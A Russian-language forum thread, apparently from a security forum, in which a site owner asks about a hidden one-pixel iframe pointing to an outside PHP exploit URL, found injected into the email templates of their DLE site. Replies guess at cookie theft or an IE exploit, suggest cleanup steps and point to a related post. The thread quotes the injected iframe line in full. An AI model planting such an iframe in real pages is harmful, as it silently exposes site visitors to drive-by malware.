Пытались хакнуть

Здрасти) у меня на сайте была обнаружена вот такая строчка

Code:

<iframe src=\"http://zabywjwzlr.biz/dl/adv448.php\" width=1 height=1></iframe>

вставлена она была в формы с текстом отсылаемые юзерам при новом ПМ или о письме с \"Обратной связи\" ...

Какие последствия могут быть? И чего мог добиться хакер?

Спасибо)

 

знакомая строчка.
такая приписывалась с слоите RST помоему..для IPB 2.1.6..

CraZy I izzi, последствия мы можем только гадать. Скорее всего кража кукисов..

 

мдя)) не повезло мне))

что посоветуете делать? чтоб такого больше не произашло?

 

я конечно не специалист, но я не смог бы с помощью фрейма без явы спереть куки, а вот троянчик закачать через сплойт к ослу вполне возможно

 

нда, макс дело говорит...

что делать? Ну наверно сменить пароль на всякий пожарный. И забанить по Ip чела -)

 

эти меры уже приняты ..

может ещё что посаветуете? или где можно почитать инфу об этом?

 

https://forum.antichat.ru/showpost.php?p=175930&postcount=3
гм.. разные adv, но смысл тот же..
Молодец, правильно все делаешь.

 

ищи дырку както уж он вставил это---- а насчет последствий мож просто клики на вас зарабатывал =)

 

Очень похоже на ссылку, которая ставится для юзания дыр ИЕ и установки тул-бара дополнительного, спайвэа и тд.... ИМХО, это она и есть...

Надо порсто весь сайт выкачивать, потом полазить по файлам и найти все пароли. Все настоящие хакеры так делают!!!

 

dinar_007, прекрати флеймить..

ребят, вы хоть видели, что там даже сайта нет?

"Fedora Core Test Page"

Побоялись зайти?)

 

гыгы... это я к тому, что геном предложил скачать пхп файл... ))
А как качалки работают я знаю... сам телепортом давно еще выкачивал всякое разное...

 

Данный iframe на Сплоит где идёт подгрузка софта!

 

Мда .. но фишка в том что этот код был вписан в Админке в \"Формы для отправки писем с сайта\" ... движок ДЛЕ ... на сколько я знаю эти формы хранятся в базе ... и по-этому могу предположить что было проникновение в админку .... может я и не прав ... но всё же

 

Не юзал движок ДЛЕ. но если логически подумать..как сообщение могло оказаться в админке.. если никто туда не проникал? ы?
Скорее всего сделали рассылку с данной ссылкой..чтобы протроянить юзеров, зареганных на сайте. как вариант.. имхо. Судя из твоих слов.

 

а я не исключаю возможности проникновения в админку ..

был у меня случай .. форум Ipb взломали у меня .. мож тогда и было проникновение через форум в ДЛЕ ... но на сколько знаю ДЛЕ сам не сильно дырявый .. хотя .. дыры есть везде ИМХО

 

спроси логи у хостера за тот день когда взлом был.

 

ослинный сплоит

Redirection Status
The URL was redirected to . Please click the link to go there.

You can enable the automatic redirection in the settings.

Generated by Opera ©